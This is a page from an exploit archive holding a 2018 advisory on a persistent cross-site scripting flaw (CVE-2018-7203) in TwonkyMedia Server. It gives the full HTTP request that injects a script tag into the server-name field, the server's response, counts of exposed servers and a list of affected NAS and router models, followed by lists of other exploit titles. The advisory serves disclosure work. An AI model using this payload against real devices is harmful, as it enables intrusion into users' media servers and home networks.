Search for hundreds of thousands of exploits

"TwonkyMedia Server 7.0.11-8.5 - Persistent Cross-Site Scripting"

Author

Exploit author

"Sven Fassbender"

Platform

Exploit platform

multiple

Release date

Exploit published date

2018-03-28

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
---------------------------------------------------------------------

1. About

---------------------------------------------------------------------
# Exploit Title: TwonkyMedia Server 7.0.11-8.5 Persistent XSS
# Date: 2018-03-27
# Exploit Author: Sven Fassbender 
# Contact: https://twitter.com/mezdanak
# Vendor Homepage: http://www.lynxtechnology.com/home
# Software Link: https://twonky.com/downloads/index.html
# Version: 7.0.11-8.5
# CVE : CVE-2018-7203
# Category: webapps

---------------------------------------------------------------------

2. Background information

---------------------------------------------------------------------
"With Twonky from Lynx Technology, you can quickly discover your media libraries of digital videos, 
photos and music in your home, control them from mobile devices, and enjoy them on connected screens and speakers.

Twonky Server is the industry leading DLNA/UPnP Media Server from Lynx Technology that enables sharing media content 
between connected devices. Twonky Server is used worldwide and is available as a standalone server 
(end user installable, e.g. for PCs/Macs) or an embedded server for devices such as NAS, routers/gateways and STBs.

Twonky Servers web UI provides optimal capability for you to easily and reliably control and play back your 
media files in a variety of ways, and to beam those media files to other connected devices." --extract from https://twonky.com

Statistics:
    Around 20800 TwonkyMedia Servers public available listed on shodan.io worldwide. (https://www.shodan.io/search?query=twonky)
    Rarely protected by password (only around 2%).
    
Top Countries:
	1. United States
	2. Germany
	3. Korea
	4. Russian Federation
	5. France
	6. Italy
	7. Taiwan
	8. Poland
	9. Hungary
	10. United Kingdom

TwonkyMedia Server seems too be pre installed on a huge range of NAS devices. For example the following NAS devices:
    Thecus N2310
    Thecus N4560
    WDMyCloud, 
    MyCloudEX2Ultra, 
    WDMyCloudEX4, 
    WDMyCloudEX2100, 
    QNAP, 
    Zyxel NAS326,
    Zyxel NAS542,
    Zyxel NSA310, 
    Zyxel NSA310S,
    Zyxel NSA320,
    Zyxel NSA325-v2
    ...

Other devices:
    Belkin routers
    Zyxel EMG2926-Q10A
    ...
---------------------------------------------------------------------

3. Vulnerability description

---------------------------------------------------------------------
TwonkyMedia Server lacks of validating user input in the "Servername" input field. 
HTTP request:
	POST /rpc/set_all HTTP/1.1
	Host: 192.168.188.9:9000
	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0
	Accept: */*
	Accept-Language: de,en-US;q=0.7,en;q=0.3
	Accept-Encoding: gzip, deflate
	Referer: http://192.168.188.9:9000/webconfig
	Content-Type: application/x-www-form-urlencoded
	X-Requested-With: XMLHttpRequest
	Content-Length: 39
	Connection: close

	friendlyname=<script>alert(1)</script>

HTTP response:
	HTTP/1.1 200 OK
	Content-Type: text/html; charset=utf-8
	Content-Language: de
	Content-Length: 30
	Date: Tue, 19 Dec 2017 04:09:21 GMT
	Accept-Ranges: bytes
	Connection: close
	Expires: 0
	Pragma: no-cache
	Cache-Control: no-cache
	EXT:
	Server: Linux/2.x.x, UPnP/1.0, pvConnect UPnP SDK/1.0, Twonky UPnP SDK/1.1

	<html><body>ok</body></html>

Now if e.g. http://192.168.188.9:9000 is visited, the injected JavaScript code get's executed.

---------------------------------------------------------------------

4. Fix

---------------------------------------------------------------------
All TwonkyMedia Server versions between 7.0.11 -> 8.5 have been tested as vulnerable. 
While writing this advisory 8.5 is the latest version available:
https://twonky.com/downloads/index.html

---------------------------------------------------------------------
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
Release Date Title Type Platform Author
2020-12-02 "EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF" webapps multiple "Hardik Solanki"
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Student Result Management System 1.0 - Authentication Bypass SQL Injection" webapps multiple "Ritesh Gohil"
Release Date Title Type Platform Author
2018-04-26 "SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response" webapps linux "Sven Fassbender"
2018-03-28 "TwonkyMedia Server 7.0.11-8.5 - Persistent Cross-Site Scripting" webapps multiple "Sven Fassbender"
2018-03-28 "TwonkyMedia Server 7.0.11-8.5 - Directory Traversal" webapps multiple "Sven Fassbender"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.